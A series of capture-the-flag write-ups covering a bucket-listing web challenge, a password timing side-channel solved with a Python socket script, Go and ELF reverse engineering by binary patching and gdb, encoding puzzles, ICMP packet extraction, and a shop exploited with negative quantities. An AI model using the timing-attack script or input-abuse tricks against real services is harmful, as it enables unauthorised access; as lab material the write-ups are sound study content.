Now that brings up the question what is the name of the bucket? I thought a clue to this was in the challenge description, “What do you bring to the beach?”.

I used Burpsuite’s repeater module to modify the endpoint and send requests rather than typing full request bodies. At this point, I was trying every object that I could think of. Sunglasses, towel, sunscreen etc, etc, etc. I even looked up websites with over 75 “essentials” for beach trip. But none worked. It was a 403 error.

You see the answer was right in the face all this time. After all the years I spent watching Tom and Jerry cartoon should have made me realize it. But one can take “bucket” to a beach. Quite ironic huh? Bucket as name for the name of the bucket. So yeah that returned a lengthy XML file.

I copied it and wrote it to xmlCon.xml. After some more internet searches I found that the node Key had the valid endpoints that pointed to files in the bucket. So I put together a python script collect.py to collect them all and write it to out.txt. For some reason I couldn’t find, the XML parser threw error after error. So I just wrote the program to check for the string ‘Key’ in the lines it read and collect the file that pointed.

import requests
import sys

with open('xmlCon.xml') as f:
    cons = f.read()
    
content = cons.split('\n')
keys = []

for line in content:
    line = line.strip()
    if line[:5] == "<Key>":
        keys.append(line[5:-6])

port = int(sys.argv[1])
with open('out.txt', 'w') as f:
    f.write(keys)
    for key in keys:
        con = requests.get("http://challenge.ctf.games:{}/bucket/{}".format(port,key)).content.decode()
            f.write(key+'\n')
            f.write(con+'\n')

Opening the file, I saw a lot of data. I mean lots and lots of data. My thought was that the flag should be encoded in one of these file data. With the amount of base64 encoding I have encountered I thought it was base64 encoded. But to my surprise, none was the data was valid base64 encoding.

So obviously, I thought I was missing something. Maybe a different kind of encoding perhaps? So search, search and search. After quite some time, in a moment of ‘I had no idea what I was even thinking’ I ran grep on the file with ‘flag’ as search string. And guess what, I found the flag. It was right in the face all along. Again.

Moral of the story, overthinking is bad.

Miscellaneous - Time will tell

Sat, 26 Apr 2025 17:51:33 +0530

Time will tell

Challenge Statement

Author: @aenygma

A side channel timing attack.

Figure out the password in 90 seconds before connection terminates.

The password is dynamic and changes every connection session.

NOTE, the password is eight characters long and will be hexadecimal.

Note: This challenge was accompanied with a per-user instance

Attachment: app.py

Solution

Oh this was a good one. I mean they did tell it is side channel timing attack right there. But still we can have fun. We are given a python script app.py. It is not a very big script, so if you want to go through it entirely you are free to do that, but here is the gist of the script.

def generate_password() -> str:
    tmp = secrets.token_hex(PASSWORD_LEN).lower()
    # with open("dump", 'w') as fh:
    #     fh.write(tmp)
    return tmp

This function generates the password that we need to find. It uses secrets module. So no pseudo random passwords. The password will be 8 characters long compromising hex characters as the challenge description tells us.

Now the big guns of the script:

def do_heavy_compute() -> None:
    time.sleep(SIMULATE_COMPUTE_TIME)

def check_guess(guess, realdeal) -> bool:
    if len(guess) != len(realdeal):
        return False
    do_heavy_compute()
    for idx in range(len(guess)):
        if guess[idx] == realdeal[idx]:
            do_heavy_compute()
        else:
            return False
    return True

We have a function do_heavy_compute that just sleeps for 0.1 second. It is made use by the check_guess function below that. Now this is where the base of exploit is. We can draw a number of points from here:

If the length of our guess isn’t equal to the length of the realdeal (the password to guess), it just exits right away.
If both have the same length, then the guesses are iterated with each index. So for every right character we guess from the start, the more number of times do_heavy_compute is called.
If we guess a wrong character in an index the function just returns.

So in summary, if our guess and the password is off same length, then the function or the program will sleep more with as many number of right guesses we have from the left.

One can think that it’s just 8 hexadecimal characters. So 16**8 = 4294967296. All we have is 90 seconds. So no, brute force is not an option.

What we can do is, we can guess 8 character passwords with the varying the leftmost character in the password. One of those guesses must take longer than the others to return. So if we record our timings, the character with most delay must be the valid character in that index. Then we can move the next one in the right. Moving right and right, the program will take longer periods of delay if we are building the right password.

I then spun up the instance just to see how the service is. It was a netcat connection.

So we got some text, a prompt and incorrect messages. In 90 seconds, I don’t really think it is possible to type in 128 guesses (16 * 8) and time it as well. Of course, python script to the rescue. I put together solve.py to read from the socket and send the guesses and record the timings in a list.

import time
import socket
import sys
import select

chars = [0]*8
seek = 0
timings = []

def getNext() -> str:
    global seek
    global timings
    if seek == 8:
        print("Password should have been obtained")
        exit(0)
    if chars[seek] != 16:
        nextstr = ""
        for i in chars:
            nextstr += hex(i)[2]
        chars[seek] += 1
        return nextstr
    else:
        selected = timings.index(max(timings))
        print("Selected: {}".format(selected))
        chars[seek] = selected
        timings.clear()
        seek += 1
        return getNext()

def readFromSocket(soc: socket.socket) -> str:
    readBuffer, _, _ = select.select([soc], [], [], 0)
    if readBuffer:
        fromserver = soc.recv(2048).decode()
        return fromserver
    else:
        return ""

if __name__=="__main__":
    nextpass=""
    cSoc = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    cSoc.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
    cSoc.connect(('challenge.ctf.games',int(sys.argv[1])))
    start = time.time()
    while True:
        inLine = readFromSocket(cSoc)
        if inLine == "":
            continue
        diff = time.time()-start
        timings.append(diff)
        print("    Timing: {}, value: {}, Server: {}".format(diff, nextpass, inLine),end="")
        nextpass = getNext()
        cSoc.send((nextpass+'\n').encode())
        start = time.time()

The code is mostly self explanatory, but let me give a quick run down. Function getNext generates the guesses based on the value of variable seek starting from 0 to 7, hence mimicking moving left to right. I used a list of integers to house the guesses as we are working with hex numbers. On each complete iteration on a particular seek, it goes from 0 to f(15) and sets the character to the highest timing taken to come back. Function readFromSocket is just one of my arsenal functions to deal with the blocking thing of recv function. Then there is main that puts everything together.

All that’s left now is to execute the script, sit back and look out for flag. Since this operation is over the network, it might take more than a couple tries to get things right. Like for instance, in the below execution the timing of the return remains as 0.3 seconds on average across different seek positions. So it is safe to conclude that the right character was not set.

But with a few tries, the timings across the seek positions will vary reliably indicating right guesses. If you are patient enough to try multiple times, it should work. Like the one below:

Overall, this was a good challenge. I had fun will putting together the script. And it kind of mimics certain real-world scenarios based on timing based attacks. So yeah, I liked this one.

Reverse Engineering - GoCrackMe1

Sat, 26 Apr 2025 17:51:33 +0530

GoCrackMe1

Challenge Statement

Author: @HuskyHacks

TENNNNNN-HUT!

Welcome to the Go Dojo, gophers in training!

Go malware is on the rise. So we need you to sharpen up those Go reverse engineering skills. We’ve written three simple CrackMe programs in Go to turn you into Go-binary reverse engineering ninjas!

First up is the easiest of the three. Go get em!

Archive password: infected

Attachment: GoCrackMe1.zip

Solution

Extracting the archive we are provided with ELF executable (linux executable) that is obviously written and compiled with Go language.

Even though this is a reverse engineering challenge, my first thought was to run it. So when I ran it (of course in a virtual machine), I got an “Access denied!” straight. So there is a good chance there is a conditional statement in the binary, that controls the execution flow.

So I decided to do a static analysis and opened the file in Cutter which is a nice frontend for the radare2 tool. Opening it, there was a lot of functions inside that turned up in the analysis. But Go language like most language, starts it execution from main function, I decided to look for the main function.

At first I was focused on the hex data that was being declared and initialized. On a quick look they might seem like data put in different variables across different locations. But you see, they are being written to consecutive locations right after one another. The reason why they are broken is because they are moved to the memory in different instructions. Some decompilers may recognize this and collate them, but the one I used didn’t.

But then I looked below it, and saw a if-else statement. Since I already suspected a conditional statement somewhere that controls the flow, I thought this might be it. Both the if and else block contained a fprintln function which is basically print function in Go. Whatever the case might be, if this indeed is the check I’m looking for then reversing the jump statement that directs the execution flow should execute the other part.

Cutter allows one to patch binaries if opened in write mode. So I made a copy of the binary as a backup if it is not what I think it is and switch to write mode. In Cutter any changes made to the binary in write mode is instantly written to the binary which is in contrast to several other tools which requires some sort of explicit ‘Patch binary’ options to write to binary.

So now, I’m looking for a jump statement in the disassembly.

As I skimmed through the disassembly, the disassembler could locate the call that goes to the function checkCondition. Following it is a test instruction and a je (jump if equal) condition. So basically this je instruction is what I’m looking for.

Cutter provides option to edit the instruction in such a way to reverse the jump, that is change je to jne. This turns the execution around.

Now that I’ve reversed the jump now, all I have to do to test my theory is to run it. Which indeed provides the flag.

Even though I got the flag, I still wanted to check if the data I was focused on previously was indeed the data that was xored to give the flag. So I opened cyberchef, copied the data in it and put the key. You may find the key at the other end of the expression in the for loop which is 0x56.

And it indeed was that data. So this could be considered an alternate method to do the challenge.

Reverse Engineering - Stack It

Sat, 26 Apr 2025 17:51:33 +0530

Stack It

Challenge Statement

Author: @sudo_Rem

Our team of security analysts recently worked through a peculiar Lumma sample.

The dentists helping us advised we floss at least twice a day to help out.

He also gave us this weird file. Maybe you can help us out.

Attachment: stack_it.bin

Note: This challenge was accompanied with a per-user instance

Solution

Running file command on the attachment, we can see that it’s an ELF executable.

Since this is a Reverse Engineering challenge I decided look into the disassembly. I used Cutter with Ghidra decompiler plugin to disassemble and decompile the ELF binary for me.

Luckily there was only one function in the ELF executable and it was fairly easy to understand. Let me walk you through it. Below is the screenshot of the decompiled function:

First thing we can notice is some data is written directly to the memory addresses 0x0804a050 till 0x0804a054.

And if you look at the data it is writing, this is hexadecimal for the characters f, l, a, g and {. Seems familiar huh?

Next up we can notice variables puVar7 and puVar8 (names given by the decompiler), are initialized to some strings each. It doesn’t matter much right now, but it will in a moment.

We can also see another variable, a pointer to be specific, is made to point the address 0x0804a055. This is right after where the program wrote the ‘{’ character above.

Then there is a loop where the contents from puVar7 and puVar8 are XORed and put in the address of puVar4 incrementally, which is just a temporary pointer with same address as puVar2, the original pointer.

Once the loop is over, couple bytes of data is put at the end of it. It is 0x7d which is the ‘}’ character and the 0 is essentially the null terminator. So this is our flag. But if you follow along the code, you’ll notice data is written again starting from 0x0804a050 which is the start of the flag.

So essentially, our flag is written to the memory, actually in the stack as it is a local variable, and then rewritten again. So to acquire the flag, we have to stop the execution midway and read the memory directly.

We can use a debugger, a program that can stop execution of a running program and analyze it from various perspectives. It was originally intended for programmers to debug programs, but the print (or cout) statement method is widely used (so do I). So mostly it is used for reverse engineering and malware analysis.

Anyway I went with using the GNU debugger (gdb) to get the job done. Oh and yeah, we are about the execute an unknown binary in a control manner, but still executing it. So it is advisable to do this in a virtual environment so that your main system is not affected. Checkout my hacky script to quickly setup a arch linux vm.

On loading the program with gdb, we can see that there is no symbols loaded required for “debugging”. Simply put we cannot disassemble the code directly.

But we already have the address actually. Cutter already disassembled the code and the assembly code is under the disassembly section.

So we need address of the instruction right after the insertion of ‘}’ character into the address space. So that address seems to be 0x8049045. So all I have to do is set a breakpoint at that address and examine the address space at 0x0804a050.

Set up a breakpoint at 0x08049048 using command break *0x08049048, then run the program to hit the breakpoint. Examined the address 0x0804a050 with x/30s 0x0804a050 ( x - examine, 30 - 30 spaces, s - string format ). Why 30 strings? Not sure why but I do it like that. So yup, there’s the flag.

Scripting - Base64by32

Sat, 26 Apr 2025 17:51:33 +0530

Base64by32

Challenge Statement

Author: @JohnHammond

This is a dumb challenge. I’m sorry.

Attachment: base64by32.zip

Solution

Unzipping the archive we are given with a text file, base64by32. Opening this file, we see a lot of data in strings. If you are familiar with few types of encodings of binary as text, you may recognize this as base64 encoded data right off the bat. Or you can infer that from the title of the challenge as well.

So I decided to decode the data with command line base64 utility.

The result of the decoding is also base64 encoded data. Since the lines of data are huge, this made to believe there were lot of rounds of encodings done on the data. So how many times, since the title hints “-by32”, I thought this indicated 32 rounds of decoding is required. So I put in a python script solve.py with the contents:

import base64

contents = ""
with open("./base64by32") as f:
    contents = f.read()

for i in range(32):
    contents = base64.b64decode(contents.encode()).decode()
print(contents)

Basically I made use of the base64 module of python library and looped the data again and again for 32 times. And my hunch was right. After 32 rounds of decoding the program put out the flag.

Scripting - Echo Chamber

Sat, 26 Apr 2025 17:51:33 +0530

Base64by32

Challenge Statement

Author: @JohnHammond#6971

Is anyone there? Is anyone there? I’m sending myself the flag! I’m sending myself the flag!

Attachment: echo_chamber.pcap

Solution

We are presented with a PCAP file. This is data from packet capture and can be opened and read by tools known as packet analyzers. I used a tool called Wireshark.

Opening the PCAP file, I see only ICMP packets.

There were 31,934 of them to be exact. This could be overwhelming at the start. But we can cut the number to half because they are all echo request and reply packets. They are used to see if there is connectivity between two hosts. A host puts out an echo request packet with some data in it. If it reaches the destination host successfully, it is echoed back, that is, the data is sent back as it received it. So if the data in both request and reply is same, we can choose to filter only one of them.

I used the filter icmp.type == 8 as request packets have their type field as 8. Reply packets have type 0, so icmp.type == 0 will also achieve the same result, except it will display the reply packets.

We still have 15,967 packets. So somewhere in those packets, maybe one or a few packets should contain the flag. I don’t know any methods to sieve through them, I just press the arrow keys to move swiftly across packets.

Another thing about these kind of challenges is they try to bury us with the large number of potential targets. So as a rule of thumb I usually start from the bottom and make my way to the top. But that’s just the way I work and this case it was beneficial to me.

When I reached packet with ID 31847, I noticed the data filled with } character. Slowly moving my way up, it was filled with hexadecimal characters, then a { character and then the characters g, a, l, f. The f character was in the packet with ID 31773.

Hence I found where the flag is. I could have copied it down one by one. But decided to write a script to do the job for me. As always I put together a python script. But before that I need some utility to extract the from the exact packets. This can be done by many ways, but I chose to use the command line utility tshark.

First I need to devise a command with tshark to list just the data. The command I ended up using was:

tshark -r echo_chamber.pcap -Y "frame.number >= 31773  && frame.number <= 31847 && icmp.type==8" -T "fields" -e "data.data"

The -r switch specifies the file that the program should be reading from. The -Y switch is used specify the filter expression. We need packets of type 8 (echo request) and packets between ID 31773 and 31847. That is what the filter expression does. The -T switch allows us to edit the output and fields specify we are going the edit the fields that are going to displayed. The -e switch is used to specify the what we want to display and in this case we want the packet data.

Now that we have the data but it is repeated and appears to be in hex rather than characters shown in wireshark. This is probably because tshark deals with that as hex values or I should have been more specific in the command. Nevertheless this is fine.

So with this data I put together a python script solve.py, to take the output of the command, parse it, and the unhex the data to get the flag.

import subprocess
import shlex
import binascii

if __name__=="__main__":
    cmd = 'tshark -r echo_chamber.pcap -Y "frame.number >= 31773  && frame.number <= 31847 && icmp.type==8" -T "fields" -e "data.data"'
    content = subprocess.check_output(
            shlex.split(shlex.quote(cmd)), shell=True, stderr=subprocess.STDOUT
        ).decode()
    content = content.split("\n")
    hexvals = "".join([con[:2] for con in content])
    print(binascii.unhexlify(hexvals).decode())

I used subprocess and shlex modules from the python library to execute the tshark command and did some clean up. Finally used unhexlify from binascii module to decode the output.

Warmup - Cattle

Sat, 26 Apr 2025 17:51:33 +0530

Cattle

Challenge Statement

Author: @JohnHammond

I know it’s an esoteric challenge for a Capture the Flag, but could you herd these cows for me?

Attachment: cattle

Solution

After downloading the file given and reading it, I found it filled with variations of moo, ooo, mmo and so on.

Since I spend some time with esoteric languages I recognized this as a programming language called COW. So all I did was find an online code execution environment and ran it. I used this from JDoodle and got the flag.

Warmup - I Can't SSH

Sat, 26 Apr 2025 17:51:33 +0530

I Can’t SSH

Challenge Statement

Author: @JohnHammond

I’ve got this private key… but why can’t I SSH?

Attachment: privkey

Note: This challenge was accompanied with a per-user instance

Solution

Opening the file reveals that it is a OpenSSH Private key. So in theory it should be able to get us into a SSH server enabled account with the corresponding public key. So I try to SSH into the instance I spun up.

I get an error message stating that SSH key is too open. It is true that SSH keys should not be read by anyone other than the user it was intended to. So I fix it by setting the permission to 600 with chmod as:

chmod 600 id_rsa

Retrying to connect, I was met with another error message.

So I finally decide to take a close look into the file. After a few minutes and a few searches I noticed the newline character was missing at the end of the key file.

So I added a newline with:

echo "" >> id_rsa

Trying to SSH again, I was successfully able to connect to the instance via SSH. The flag was in a file flag.txt right there. Reading the file revealed the flag.

Warmup - MatryoshkaQR

Sat, 26 Apr 2025 17:51:33 +0530

MatryoshkaQR

Challenge Statement

Author: @JohnHammond

Wow! This is a big QR code! I wonder what it says…?

Attachment: qrcode.png

Solution

As we can see the given file is a QR code.

So obviously I scanned it using zbarimg with the command:

zbarimg -q --raw qrcode.png

On scanning the QR code I got a string that looked like this:

\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00 ... \x00\x00\x00\x00IEND\xaeB`\x82

This is binary data. And if you have worked with magic numbers and PNG files, you’d see the PNG file signature and IHDR and IEND which are PNG headers. So what we have is PNG data in binary encoded format.

But the problem is this not exactly in binary. So we need to convert the string to actual binary. So I used python to do the job.

binary_data=b"<data from the png>"
with open('qr1.png', 'wb') as png_file:
    png_file.write(binary_data)

Moving onto the next image, we find another QR code, hence the name of the challenge.

So again I scan the QR code using the same command as above and it gave the flag.

Warmup - Mystery

Sat, 26 Apr 2025 17:51:33 +0530

Mystery

Challenge Statement

Author: @Michael

Someone sent this to me…

such enigma, such mystery:

rkenr wozec gtrfl obbur bfgma fkgyq ctkvq zeucz hlvwx yyzat zbvns kgyyd sthmi vsifc ovexl zzdqv slyir nwqoj igxuu kdqgr fdbbd njppc mujyy wwcoy

Settings as below:

3 Rotor Model
Rotor 1: VI, Initial: A, Ring A
Rotor 2: I, Initial: Q, Ring A
Rotor 3: III, Initial L, Ring A
Reflector: UKW B
Plugboard: BQ CR DI EJ KW MT OS PX UZ GH

Solution

This challenge had no attachment to download. So all we have is a cipher text and some “settings”. From my recollection of the movie The Imitation Game I remember that the Enigma machine had rotors and some sort of plugboards.

That and the enigma in the challenge description strongly suggested we have a enigma cipher with key. I don’t have a enigma machine, luckily I found this decoder. I put in the ciphertext, plugged in the setting and got an output.

I don’t know about you all if you noticed. But I missed it. I thought there was another level of cipher to the output and tried a few cipher decoding but none worked. Then I saw it. The message is right there, except white space in the wrong place. I forgot enigma does that. So copying it to a text editor and modifying it I got:

After some text the flag is given. Since enigma doesn’t support anything other than alphabets, I guessed it is implied we have to put the curly braces in the flag. And it was right.

Warmup - The Void

Sat, 26 Apr 2025 17:51:33 +0530

The Void

Challenge Statement

Author: @JohnHammond#6971

When you gaze long into the void, the void gazes also into you…

Note: This challenge was accompanied with a per-user instance

Solution

This challenge had no attachment to download. We are to use netcat to connect to a given instance. Doing so printed grey block characters such as in the image below:

At first I had no idea what it was. I redirected the output to a file with the below command and opened it in a text editor and it was not really readable to start with.

So based on the challenge description I decided to run it for something thinking it was a sort of timing thing. Run it long enough and maybe it prints out the flag. So I did it.

I ran it quite a while and got bored. I have habit of dragging and selecting text when I’m waiting for some command to finish up. I did that and noticed some text move in the output. I stopped the program and started selecting the text and the flag was right there.

I’m not sure whether this is the intended way to solve this. But yeah, got the flag.

Warmup - Too Many Bits

Sat, 26 Apr 2025 17:51:33 +0530

Too Many Bits

Challenge Statement

Author: @JohnHammond

What do all these ones and zero’s mean!?! We are in the Warmups category after all…

01100110 01101100 01100001 01100111 01111011 01100100 00110000 00110001 00110100 00110111 00110001 00110111 00110000 00110010 01100001 00110001 00110000 00110001 00110011 00110100 01100011 01100100 01100001 01100100 00110001 01100100 01100100 01100100 01100101 00110000 00110110 00110110 00110111 00111000 01100110 00110010 01100110 01111101

Solution

This was a challenge from day one. Pretty obviously binary data. Pasted it in Cyberchef and got the flag.

Warmup - TXT Message

Sat, 26 Apr 2025 17:51:33 +0530

TXT Message

Challenge Statement

Author: @JohnHammond

Hmmm, have you seen some of the strange DNS records for the ctf.games domain? One of them sure is odd…

Solution

The challenge description suggests some strange DNS records with ctf.games I decided to lookup the DNS records. Further the title of the challenge says more. Since I put some time studying DNS protocol I am familiar with a TXT query type that pulls the text data given by the domain administrator.

Hence using the dig command from the bind with the query:

dig -t TXT ctf.games

We find a bunch of data in the answer section. It took me a few minutes but I recognized it is octal data. So plug it into Cyberchef and I got the flag.

On a unrelated note, I found there is a link to od in the challenge description which is a tool for octal dump while writing this writeup, suggesting we might encounter octal data. But I didn’t notice it.

Warmup - Typo

Sat, 26 Apr 2025 17:51:33 +0530

Typo

Challenge Statement

Author: @JohnHammond

Gosh darnit, I keep entering a typo in my Linux command prompt!

Note: This challenge was accompanied with a per-user instance

Solution

This challenge requires us to SSH into a provisioned per-user instance with the given password. While doing so, I was met with a train.

If you have been around the linux community for sometime, you should have been familiar with the sl command. This command was intended to show the user that they mistyped ls in a fun way.

But our problem is the connection shows us the train and exits without providing us a chance to interact with the instance. I thought it was because of hard-coded .bashrc file that contained sl command and made the shell exit.

So I worked around it with by specifying the shell to use when connecting to the instance. Since my theory was that it was because of .bashrc file, I intended to use another shell other than bash. Since almost all system contains the sh shell, I thought of using it.

With the following command, I SSHed into the instance and this time I got an interactive shell.

ssh -p <port> user@challenge.ctf.games -t /bin/sh

The flag was in a flag.txt in the directory right there.

Warmup - Unbelievable

Sat, 26 Apr 2025 17:51:33 +0530

Unbelievable

Challenge Statement

Author: @JohnHammond

Don’t believe everything you see on the Internet!

Anyway, have you heard this intro soundtrack from Half-Life 3?

Attachment: Half-Life_3_OST.mp3

Solution

Downloading the file, it seems to be an MP3 audio. So I played it with aplay from ALSA driver. It actually played but it was just random noise for a couple seconds.

Since the challenge description tells about misinformation I decided to check if it is really a audio file. So I checked it with the file utility.

So it appears this is not an audio at all. I have no idea how aplay played it. So anyway treating it as a image file and I opened it and the flag was in the image.

One might use OCR techniques to read the flag or just type from it manually.

Bonus point: If you use something like the ranger file browser, it just shows you the flag directly. No fuss.

Warmup - Whamazon

Sat, 26 Apr 2025 17:51:33 +0530

Whamazon

Challenge Statement

Author: @JohnHammond

Wham! Bam! Amazon is entering the hacking business! Can you buy a flag?

Note: This challenge was accompanied with a per-user instance

Solution

Starting the instance, I was provisioned a URL to an page. It was a GoTTY application. I was greeted with a menu to begin with.

Examining the inventory, it tells that we have to buy something.

So, I decided to look at what was for sale.

It appears we have 50 dollars in my account and among many items the flag was also listed. So I went ahead and tried to buy it.

So we need quite the sum of money to buy the flag. At this point I thought there would be some session variable or token that contains the available balance on my account. I even went to inspect the web socket traffic and decode it in attempts to find it.

And then it hit me. I tried to buy -1 quantity of Apples. And it worked.

So it is one of the oldest tricks in the book, insufficient input validation. So we should be able to use this to add money to our account and buy the flag. And that’s exactly what I did.

So now that I have the balance I went ahead and bought the flag. But that’s not it. I was invited to a Rock, Paper, Scissors and the program said it won’t choose scissors. So I chose rock. It was a tie.

It played rock everytime, so when I chose paper I won and it said the flag was added to my inventory.

Then I quit the game and the buy menu and opened my inventory. The flag was right there.